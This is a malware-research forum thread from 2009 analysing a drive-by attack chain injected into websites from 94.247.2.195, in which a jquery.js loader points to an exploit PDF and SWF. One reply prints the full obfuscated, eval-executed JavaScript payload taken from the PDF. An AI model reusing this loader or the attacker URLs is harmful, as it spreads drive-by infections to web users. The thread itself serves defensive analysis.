Author Topic: hs.2-195.zlkon.lv - (94.247.2.195)  (Read 28358 times)

0 Members and 1 Guest are viewing this topic.

April 07, 2009, 04:31:11 am
Read 28358 times

sowhat-x

 • Guest
Ok now,that's a pretty "funky" one...
It's being injected in misconfigured sites out there during last week - you can easily find few example complaints via google:
http://www.google.com/search?q=94.247.2.195%2Fjquery.js

Quote
hxxp://94.247.2.195/jquery.js
--->
hxxp://94.247.2.195/news/?id=100

So far it can be trivially decoded thanks to Malzilla, and shows us the following...

Quote
hxxp://94.247.2.195/news/?id=2
Which is a pointer to pdf - Result: 0/40 (0.00%):
http://www.virustotal.com/analisis/e85487bf540c8011c2aafd4369109df3
Plus,a pointer to a swf as well - Result: 0/40 (0.00%):
Quote
hxxp://94.247.2.195/news/?id=3
http://www.virustotal.com/analisis/b17f0747e571ab126f95bad30bc0ad21

I'm not really able to successfully decode them statically without executing them though,any ideas?
I've got the impression that the .swf is more or less the container of a xor key,
that is being used in order for the pdf's contents to be decoded...
Or i'm i in a completely wrong direction,and i should better go grab myself some extra coffee?...  ::)

Password is "infected",as always...

April 07, 2009, 06:17:04 am
Reply #1

MysteryFCM

 • Administrator
 • Hero Member

 • Offline
 • *****

 • 1693
 • Personal Text
  Phishing Phanatic
  • I.T. Mate
I think you could be right :( ..... the following is the uncompressed output from the PDF;

Code: [Select]
(gt=/,<@:|>-@|@:->;|,;:, |.  |><.-|-.;.|;;,@>| ,.|-@<@/g;\(function\(tmx,rts\){zz=\('ff'+'n'+tmx.substr\(0,9612\)+'1'\).substr\(3,9615\).replace\(rts,''\)}\)\('fun,;:, ction>-@ g3\(t\){var;;,@> d><.-=>-@"",c1,;;,@>c2,c3,>-@e><.-=[],j=0,,<@:k=";;,@>eZCd05;;,@>W@:->;gRrA-@<@n1j+S2PcMhB4wfOD@:->;Ey-@<@96tivp>-@=l-.;.HmJzoYNkGX8FLVTqQ3asxUIb.  7/.  K-.;.u>-@";do{for\(v ,.ar i=,<@:1;i<5;i+@:->;+\);;,@>e[i ,.]-@<@=k.indexOf\(t>-@.charAt@:->;\(j-@<@++\)\);c,;:, 1=\(e[1 ,.]<<2\)|\(e[@:->;2]>>4\)@:->;;c2=,;:, \(,;:, \(e[>-@2]&15\)<<4\)|\(e[3]@:->;>>2\);c3 ,.=\(.  \(e,<@:[3]&-.;.3\)<<6\)|e[4];-.;.d=d+Stri>-@ng.-.;.fr,;:, om@:->;Char@:->;C,;:, o-@<@de\(c1 ,.\);@:->;if\(e[3;;,@>]!.  =64\)d=d+St,;:, rin,;:, g.f,;:, rom><.-CharCod>-@e\(c2\) ,.;if@:->;\(e[4@:->;]!=@:->;64\)d=d+><.-Str,;:, ing.fromChar.  Co,;:, de\(>-@c3\);-.;.} ,.while\(j<t.length\)><.-;re@:->;t@:->;urn>-@ d;}e@:->;va>-@l\(g3\("9HZHPBvqh3-.;.y794xHy3j.  vyWhzRp;;,@>B,<@:Qj ,.d1q1VBQjd1q1 ,.VBQj.  d1-@<@q1VB-.;.Q10O52pB@:->;Q1.  T1-.;.Q2pBQ ,.j=Od+cBQ+dZ><.-C+c,<@:BQ+d-@<@eF1-.;.c.  B;;,@>QPh ,.f;;,@>T ,.1,;:, VBQPM,<@:R-.;.q;;,@>1VBQ-.;.P><.-hr>-@W ,.2cBQP-.;.M-@<@iF><.-jcBQP ,.l.  O52V@:->;B@:->;QP,;:, lOWPp ,.B,;:, Q+0RaPpBQP>-@0.  f-@<@qP>-@c;;,@>B,;:, Q-@<@PhO5PpBQ@:->;j ,.=P;;,@>5PpBQPMjZPp-.;.BQ+ ,.h-@<@f3jCBQ>-@j ,.drW.  1VBQ+hf3jCBQ.  jlB5jVBQP><.-hfF1VBQ;;,@>PhO.  5-@<@2pBQj=P><.-5>-@PpBQ,<@:2=lF1VBQj=0sjVBQPM5Z1c.  BQ-.;.1d><.-y,;:, F-@<@1;;,@>VBQPhfL>-@1cB;;,@>Q-.;.P,;:, h><.-O5Pp-@<@B.  Q2h03jpBQ,;:, 2=H52pBQjTy@:->;sjVBQj,;:, =-@<@hL1cBQ1d951.  cBQP>-@hfLPpBQPhO5Pp>-@BQ2h0@:->;3jpBQ2=H5jVBQ2q-.;.0,;:, sjVB.  Q1,<@:M ,.eQPpBQ1dyVPCBQPh.  fFPCB>-@QPhO5PpB;;,@>Q ,.2h><.-03jp-.;.BQ;;,@>2=H51V.  BQ1.  desjVBQ10fV.  1-@<@cBQ1d><.-y-.;.sPp.  BQ,<@:PhfT,<@:2pBQ><.-P@:->;hO5P.  p;;,@>BQ,<@:2h>-@03j,<@:pBQ2=H.  W,;:, Pp><.-BQ1lh><.-sjVBQ1,;:, 0,;:, 0x;;,@>jpB>-@Q1-@<@dy,<@:QjVBQP;;,@>h><.-fV+,<@:c>-@BQP-@<@hO5P ,.pBQ2h03 ,.jpBQ,;:, 2h><.-OW><.-2-.;.p ,.BQP-@<@dy3P>-@pBQ><.-+ ,.h0V2-@<@V-.;.BQj=fL@:->;jcBQP=@:->;9Z2cB@:->;QPMi>-@F,<@:jpBQ.  PhO5PcB-@<@Q2=5;;,@>5-.;.PpBQ>-@+h03jpBQj=Pd2pBQPh-@<@rZ>-@2>-@cB.  QPhh,;:, sjc><.-BQj=PC><.-jp@:->;BQP=9C2cBQ1d9,;:, C+cBQ@:->;Phf3j,;:, CBQ ,.PhO><.-5 ,.P>-@p-@<@BQ+.  d9CPpBQP=.  B-@<@0,;:, +cBQ@:->;+-.;.hO@:->;d1CBQjTiFjVB ,.Q>-@PhO5Pp;;,@>B ,.Qj=O,<@:5Pp;;,@>B.  Q.  P=jZ-.;.2cB-@<@Q1l03jCBQ1-@<@lf32V-.;.B-@<@Qj=OCPpBQ2qOZ-.;.2cBQ1MesjV,<@:B>-@QPhO5PpBQ2lO5,;:, Pp><.-BQ2h03;;,@>j,;:, CBQ+d@:->;BW;;,@>2pBQ2=O5PC@:->;BQ.  2l0><.-3j ,.CBQ1d9WjVB>-@QPhfs;;,@>PcBQPhO,;:, 5Pp@:->;B@:->;Q2h55.  2VBQ><.-1=vdP,;:, p>-@B,<@:Q2-@<@=j>-@5,;:, PpB@:->;Q@:->;2T0x,;:, 1cBQ1=i.  s2-@<@cBQPh-.;.rZ-.;.P@:->;p-@<@BQ,;:, + ,.00xjVBQPh,<@:O5P@:->;pB,;:, Q+h0.  L>-@1C-.;.B>-@Qj=Pd@:->;PpBQPMj;;,@>Z,<@:2cBQPhhsj.  cBQj>-@=PCj ,.p><.-BQ ,.P ,.=9C2cBQ2hfFjVB><.-QPh><.-O5PpBQ+dB5P;;,@>pBQ2=95.  +-.;.C,<@:B ,.Q2h552VB,;:, QP0j;;,@>d2pBQ2l,;:, 1TjC ,.BQ><.-1MZC2-.;.VB,;:, Q2>-@q-.;.f-.;.x2 ,.cBQ2lj,;:, C ,.PpBQ2h03j,;:, CB-@<@Q+d-@<@BW1VB@:->;Q2-@<@=O52cBQ2l,<@:03jC.  BQ,<@:1d@:->;9>-@WjV,<@:BQ,<@:P.  hOd2VBQPh>-@O5PpB.  QPh@:->;fsjcBQ+h>-@0><.-L1,<@:CBQj=PdP-.;.pBQ@:->;PM9Z2;;,@>cBQPh2sjcBQ,;:, j@:->;=PCj,<@:pBQP=9C2c,<@:BQPl-@<@fFj-@<@VBQPhO5-@<@PpBQ>-@+dB5.  PpB ,.Qj-.;.=2L1CBQP ,.lO,;:, Z2cBQPhh,<@:s;;,@>j-@<@cBQ-@<@j=PCjpBQP=9><.-C2c>-@BQPhfF-@<@jVBQ;;,@>PhO5PpBQ ,.2-.;.hB@:->;5><.-P>-@pBQ2lPC,;:, jC-@<@BQ10B52VBQ><.-10B5-@<@2 ,.VBQ10B52,<@:VBQ10@:->;B52-.;.V-.;.BQ1>-@d1 ,.32VBQ2=B,;:, 5,<@:2pBQj=PC@:->;2VBQ1-.;.02T-.;.jcB>-@Q2 ,.l2><.-L.  +CB,<@:Q1,;:, 0.  fL1.  CBQj@:->;=PC2cBQj=2F1VBQP;;,@>M><.-yx,<@:1>-@pBQ2-.;.=R,<@:3jCBQ2=;;,@>H5>-@1VBQ+h1><.-3jCB,;:, Qj=P.  01VBQ><.-P=-@<@0x2pBQPh1><.-x-@<@jVBQ2=l-.;.L2><.-VBQ+.  Ml3jC-@<@B@:->;QPh,<@:jd ,.PpBQP01L2VB,<@:Q2Mf-.;.VjpBQjdrZPcBQ1l@:->;j5,<@:2><.-VB,;:, QP0jC+.  cBQ,;:, PMeL+cBQ>-@PlfQ1;;,@>cBQ-@<@1h;;,@>P0;;,@>jcB><.-QPM@:->;yx2pBQ1=0 ,.VP,<@:cBQPhj51pBQ2,;:, h,;:, fL.  PC ,.BQ1h@:->;hFjCBQ1M,;:, 5,<@:0,<@:jC ,.B;;,@>Q+h.  5C>-@1@:->;c ,.BQ2=hF2.  cBQ1 ,.d23j,;:, C;;,@>BQ.  2=h3.  jCB-.;.QPh ,.jd2,;:, pBQ ,.+dlT1pBQ,<@:PM13jCBQ;;,@>j=,;:, PZ;;,@>j>-@CB@:->;QP=jCjcB,;:, Q.  1Tr@:->;52V><.-BQPhR><.-3jCBQPh ,.13j;;,@>C><.-BQ-.;.2=0V,;:, 2cB.  Q1lP.  C1,<@:pBQPh><.-O5@:->;jVBQ1hRFj.  VBQ-.;.1-.;.MeL1-@<@c><.-BQ-@<@2l0><.-L1CBQ-@<@2MjCPC,;:, BQ2MZZ>-@1p><.-BQP,;:, hOZ1cBQjT23+CBQjT,<@:ea;;,@>jCBQ1lfT2-@<@cB><.-Q1,<@:Tl,;:, VP;;,@>pBQ@:->;1lhTjCBQ1 ,.T2T><.-1,;:, pBQ1lhTjVBQ1><.-lhT>-@1pBQ1T;;,@>lT1.  cB@:->;Q1-.;.lfTjcBQj><.-=-.;.h3-.;.PcBQjT1.  aj;;,@>VBQ,<@:1-.;.q.  fVPpB,<@:Qj=><.-23+cB-@<@Q1T0><.-TPC ,.B.  Q1= ,.f.  T1C ,.R,;:, o+VZ><.-3fw>-@Rihd,<@:5kyQ,<@:P.  2PaesM;;,@>ce ,.7RWx>-@H9V,;:, Z><.-Z,<@:yJr,<@:v6ci-@<@o+VZ,<@:m94x=9,<@:W-.;.H8EpZ,<@:X6wi3-@<@Ed0z-.;.Ew-@<@9zyq.  Gf1>-@Jfk,<@:RW.  P ,.P6,<@:WLq9-@<@W><.-rZy-@<@wPa.  +45SAc ,.ZI-@<@Rg9zD,;:, 4LHRCvG93vTcQ ,.iV9pxk>-@O4xJ9Wi,;:, Y><.-1=Ll>-@hwv,<@:k><.-9><.-g ,.Pp2w.  5@:->;q9;;,@>T-@<@H-@<@vMV><.-H;;,@>IEw9><.-z>-@yq@:->;Gf1 ,.JfiATqiEw9 ,.zy;;,@>qGf1JfItcZG9><.-3vTcQiV-.;.9pe7RWQa-@<@D ,.gjn4dr3n;;,@>Jj ,.Qf,;:, J-@<@jqymH;;,@>XOViFnW,;:, PP6,;:, WL,<@:q9WrZywPa+45@:->;SnTRo@:->;+VZVOw;;,@>PQy,<@:msiEw9zyq.  Gf1JfIRgqiOJBX-.;.fa><.-P-@<@oE3sicHBL4l.  5,<@:+PHlz901,<@:QfB5C2J>-@0o-@<@Rgk,;:, i9m5VRWb>-@q.  fm,;:, BUPhoR9hfiSce@:->;F6d,<@:Z=1W1>-@Ff>-@TZ=@:->;+VZ3fwRihW9>-@Fy0z>-@QDC;;,@>e7R;;,@>dZsjd ,.eF1deF+V.  Z3.  f.  w.  R>-@i@:->;M-.;.wvzyTHa>-@4@:->;JB1+5;;,@>OW4Mf-.;.iSc,;:, Zq>-@2TBvh,;:, hrCycxkO4x,;:, J.  9Wi@:->;iApeV+.  VZ3f,<@:wRiO55sEg;;,@>P@:->;qf,;:, l><.-5-@<@L9gyxfhbiScZ><.-2O>-@a@:->;Z-.;.Fc ,.= ,.BzR><.-C,<@:q><.-i,;:, A-@<@0Q@:->;s.  Dg1x9,<@:Q.  oQMdv4PHl>-@3A-.;.TZs1T@:->;io+.  VZ3@:->;fwRiE,;:, w9zyqGf1Jf><.-i ,.ScZQEmBTf35FOcip-.;.r,;:, whx1d ,.lFrw,;:, hx,<@:1dl.  FR,;:, pl@:->;IRWQ>-@aDg ,.jn-@<@4dr><.-3R.  dqiE>-@J,;:, Hs,;:, jmFLAWQaDg-@<@jn4dr-@<@3><.-nCZl,<@:h-@<@wvk><.-9gPp2,<@:w,;:, 5q9,;:, THvM-.;.VlI,;:, R-.;.gO><.-vypZOP-.;.J9U,;:, DhQg><.-Rdqi-@<@AWbqfm><.-B>-@U.  PhoR9hfinceF6 ,.d2><.-F1d.  eF1C;;,@>l8-.;.hW9Fy,<@:0 ,.z ,.QDd.  k-.;.iOm-.;.7VRCv3f><.-w,<@:Ri;;,@>OQixMlr;;,@>p><.-4=HjM4HqSMeIO>-@QixMlrp>-@4,;:, =H@:->;j,;:, M4HqS5,<@:H.  W9@:->;aooM,;:, hyI-@<@OQixMlr.  p4=H-.;.jM4HqA.  Vk ,.oRgk ,.i@:->;hd5kyQ ,.P2PaesMBGJ4d.  H+2mrD+,<@:hQjDw@:->;P9R><.-dqi-@<@E,;:, w ,.9z-.;.yqGf1JfiAVZ;;,@>q ,.2,<@:TBvhhr,<@:Cy>-@M;;,@>kitcZ7RWOQEm@:->;j-.;.qD4-.;.7X,<@:R07+1g2V,;:, Ag-@<@H>-@RB5isAc>-@Z><.-IRgO><.-vypZ06=j-.;.4BJo3RdqifwZFnJ>-@OoOw>-@9 ,.HyH.  O,;:, HyJjoE3,<@:sX9,;:, W7M9,<@:gr,<@:oEmyzAM,<@:kiPgzTBH-@<@O@:->;U>-@9,;:, pe7R0P>-@U1 ,.QO4><.-6Jf><.-XymBF>-@EW5=Oci8w0>-@28OV.  FpRplI-@<@RgOvypZGfM5+E>-@d0Fh-.;.Q-.;.ZxOVe,;:, 7RWxH9VZZyJ ,.r>-@v6cv@:->;0.  6=,<@:j4BJo3n-@<@mj-@<@zfwrZ9C,<@:iFAc ,.L;;,@>06=j4BJo-.;.3nmjzfwrZ.  9@:->;C ,.iLAcL06=j4BJo3nm><.-j>-@z;;,@>fwrZ9C,;:, iV><.-Ac-@<@lIRWHmRCi,<@:zE40LMmF;;,@>L1,<@:5j>-@26><.-4-.;.9E15qiS;;,@>M,;:, qi ,.+,;:, C@:->;e.  mrpe;;,@>zAWQv1,;:, h><.-xk1MZ;;,@>M>-@hgHJ-@<@4,;:, T59R,;:, dq-.;.7Rd0irpfiE@:->;40,;:, L;;,@>M;;,@>mF,;:, L15j264-@<@9E1-@<@HqiSCeV-.;.A><.-cZbtCZ.  Gf,;:, M5;;,@>+Ed-.;.0FhQZxOQkLwcebRd0 ,.oA-@<@cZbtCez,<@:E40LMm-@<@FL1-.;.5j264-.;.9E><.-1-.;.5qi><.-SM,;:, qijVe-.;.m>-@rpZ.  Gf.  M5-@<@+Ed0;;,@>FhQ@:->;Zx;;,@>OQ-@<@kLw.  c@:->;e,<@:bRd0o,<@:RgLb><.-RCvGfM5+-.;.Ed0Fh-.;.QZx@:->;OQkF ,.wcebR;;,@>dyo ,.AcZIR0o,;:, ByBoZM ,.lO-@<@OA@:->;gH,<@:RB5i;;,@>sAMki.  9m-.;.5VR0Ozh;;,@>qP-@<@Z9w.  Zj6,<@:JZp ,.Rd@:->;q,;:, i94,<@:xHy-@<@3.  j-.;.vy><.-Wh.  zRpBQ,<@:1W1FfV ,.BQ-.;.1;;,@>W1F-.;.fVR,<@:o+V,<@:Za@:->;DWHk ,.OcvWD5@:->;j02-@<@wBFM-.;.w-.;.oFf.  px.  kO><.-4.  x,<@:J9Wi-.;.iSC,;:, eqjd ,.lQ,;:, 1pliPmvMP05,;:, Q;;,@>y0>-@QUyWRiA,<@:T@:->;qi><.-PmvMP ,.0 ,.5Qy0@:->;QUyWRIRg,;:, PzDw-.;.1Xf37-@<@kEW5,<@:p ,.haP8ymh ,.iS-@<@cZ,<@:dE3Lkf4;;,@>RXf37kEW.  B=90BGf ,.4-.;.Hkc4xmEV@:->;vI,<@:yaBpD-.;.=zi>-@RpRkEwjJ+pZW,<@:D5j02wBF,;:, M-.;.woFf;;,@>Jq@:->;o;;,@>+VZV><.-OwP><.-Qy,;:, msi1dki>-@t;;,@>wrH,<@:9g;;,@>BVEp><.-eL-@<@+.  V.  Z7RWHmA0-@<@7+,<@:1 ,.g2VAgO2OhBf95jJ,;:, AcHIRgO-.;.v,<@:ypZzD-.;.BiqP ,.wvz>-@y>-@H,<@:y79 ,.4xH,<@:y3 ,.jvyW><.-hzRpBQ100@:->;F2cB><.-Q><.-100F2cRo,;:, +aOvypZXEMqV1>-@dG,;:, 3;;,@>fwRiOm>-@y7-@<@EmqN9.  HZHPBvq;;,@>h@:->;3yXEWBXO,;:, aPz+VZa,<@:DWHk-@<@OcvzD><.-B><.-iqPwv,<@:zyHyXE-.;.WBXOa ,.PzSW,;:, OJ;;,@>A4vo4;;,@>dP56Wv-.;.VBV-.;.k;;,@>7DWH-@<@f,<@:j0BsDgrw;;,@>+-.;.aOv>-@yp-@<@ZXE-@<@4 ,.rVS4,<@:vo4,;:, dP56WvVBV,<@:xT ,.94rT-@<@9 ,.g.  r-.;.oEm;;,@>yz1CL ,.mOV,;:, lIRgOvyp;;,@>ZT9WHJS4vo-@<@4dP56WvVBV ,.x><.-T@:->;94rT9groEmyz1CLz><.-D;;,@>Bi ,.qPwvzy><.-H-.;.yXE;;,@>W ,.B-@<@XOaPzn4OJAM>-@ki93v>-@oEWhz>-@yaPoOVxkO4,;:, xJ.  9Wi@:->;NOmyb1g-.;.i31d.  eF1-@<@C,<@:HT><.-9W@:->;HJS.  wj.  qD4yNya>-@PoO,;:, V><.-G-.;.XE-@<@4rV-.;.+VZ3fwR-.;.ifwrV><.-EMQXOwyi2wr,;:, V@:->;fwlzAMGmE-.;.a.  RzD,<@:w;;,@>z71dGo6;;,@>=FL1=eF><.-+><.-3><.-HU><.-AVko6-@<@35@:->;VymQEDw-.;.o9;;,@>S.  w><.-jqD-.;.4yN9HZHPBvq>-@h-@<@397Rg-.;.OvypZ+hh5kPq ,.vaPT@:->;q><.-p1MRxRpkp+Ml.  x+ ,.Mlx+@:->;Ml@:->;p;;,@>A;;,@>VRx+Mlx+cRN-@<@R-.;.=><.-lx+MlpAVRs+dis,<@:+d,<@:isRpkp-@<@+dis+d ,.is><.-+dis@:->;+d;;,@>is+>-@di@:->;s+dis><.-+di ,.s ,.+dis+d,<@:is>-@+di>-@s>-@Rpkp+dis+ ,.d,<@:is@:->;+d-@<@is+dis+dis+dis+dis+dis+d@:->;is+dis ,.+,;:, di@:->;s+.  dis.  +dis+d-@<@is+><.-d;;,@>is+dis+di-@<@s+d>-@is+dis+dis-@<@+dis+d-.;.is+-.;.dis+;;,@>dis+dis+,;:, d@:->;is+d><.-is+d.  is+-.;.di@:->;s+dis+di.  s+d-.;.is+,<@:dis;;,@>+dis+dis-.;.+><.-di-.;.s+di,;:, s+dis><.-+.  dipAVRs+di><.-s+d.  is+d,<@:is@:->;+d-.;.is+><.-d><.-i,;:, s+dis+dis+d><.-i ,.s+di><.-s+di.  s+dis+dis+d><.-i;;,@>s+di-.;.pA;;,@>VRs+>-@d-.;.is+;;,@>dis>-@+dis-.;.+dis+dis+d><.-is+di@:->;s+d>-@is+.  dis;;,@>+dis@:->;+di-@<@s+CR,;:, N,<@:R>-@=is+di,;:, s+di;;,@>s+dis+dipAVR,<@:s+dis+dis+dis+dis+dis+;;,@>disRpk-.;.p+-.;.di@:->;s,;:, +d><.-is+dis+d;;,@>is+di,;:, p-@<@+VZ,;:, Q,<@:9,;:, W><.-HknJZ;;,@>VD-.;.4-.;.xqOpiprM2Q1d ,.eFO ,.pRkMH5,;:, ZE09R@:->;9,;:, q-.;.yo+aqu"\)\);',gt\);eval\(\('ac'+'d'+zz+'cd'+'m'\).substr\(3,zz.length\)\);)
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net


April 07, 2009, 06:28:25 am
Reply #3

MysteryFCM

 • Administrator
 • Hero Member

 • Offline
 • *****

 • 1693
 • Personal Text
  Phishing Phanatic
  • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

April 07, 2009, 06:36:09 am
Reply #4

sowhat-x

 • Guest
The .js is easy,thanks for the pdf - but for the swf file though?
That's what puzzled me the most...Flasm ain't really got support for flash9,so it couldn't decompile it.
Then i've also tested 2 commercial flash decompilers/disassemblers,and both of them kept crashing,he-he,i wonder why...  ;D
The closer i could get about disassembling it,was via abcdump here:
http://iteratif.free.fr/blog/index.php?2006/11/15/61-un-premier-decompileur-as3

April 07, 2009, 06:45:20 am
Reply #5

sowhat-x

 • Guest
Here's abcdump's output,for the sake of easiness...

April 07, 2009, 06:46:30 am
Reply #6

SysAdMini

 • Administrator
 • Hero Member

 • Offline
 • *****

 • 3335
Ruining the bad guy's day

April 07, 2009, 07:06:16 am
Reply #7

sowhat-x

 • Guest
The xorkey there has a totally different usage than what i had thought originally above...and here's the idea/concept behind it,more or less:
http://blog.dannypatterson.com/?p=135
And now,go check out this paper as well...guys,it's not really good news - but i think we're getting a bit closer regarding how this crap works:
http://www.aladdin.com/pdf/airc/airc-report-jan-09.pdf

April 07, 2009, 07:25:28 am
Reply #8

sowhat-x

 • Guest
By the way,the domain mentioned in the paper is in the list from back in early January...hardmoviesporno.com namely.
So,now i guess we know where to start in order to decrypt this kind of crap as well,but it's pretty cumbersome doing so by hand,pfff....  :(
One more note...in case anyone wants/needs an updated actionscript disassembler with gui as well:
http://www.docsultant.com/nemo440/

April 07, 2009, 07:39:38 am
Reply #9

MysteryFCM

 • Administrator
 • Hero Member

 • Offline
 • *****

 • 1693
 • Personal Text
  Phishing Phanatic
  • I.T. Mate
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net

April 11, 2009, 07:22:30 am
Reply #10

toni

 • Newbie

 • Offline
 • *

 • 3
sowhat-x:
Hi,
sorry but didn't spot your message earlier. The system failed to notify me.

I'm on-call the whole easter so I'm pretty busy but I'll deifnitely take a closer
look when i have time. I can say though that the flash contains another flash
that is in xorred mode. I haven't had a chance yet to decrypt it but I'll have a
whack at it asap. I'll post you an update when I have something.